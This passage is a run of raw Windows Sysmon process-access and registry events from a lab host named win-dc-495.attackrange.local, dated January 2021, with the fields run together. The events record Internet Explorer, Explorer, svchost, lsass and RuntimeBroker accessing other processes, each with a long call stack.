Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:16.272{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:17.276{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:59:18.672{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0x1d56e1eb) 10341000x800000000000000013658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:19.932{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:19.916{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:19.916{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:20.100{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:20.100{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.990{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:21.225{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.209{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.209{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 
10341000x800000000000000013667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:22.053{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:22.053{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEF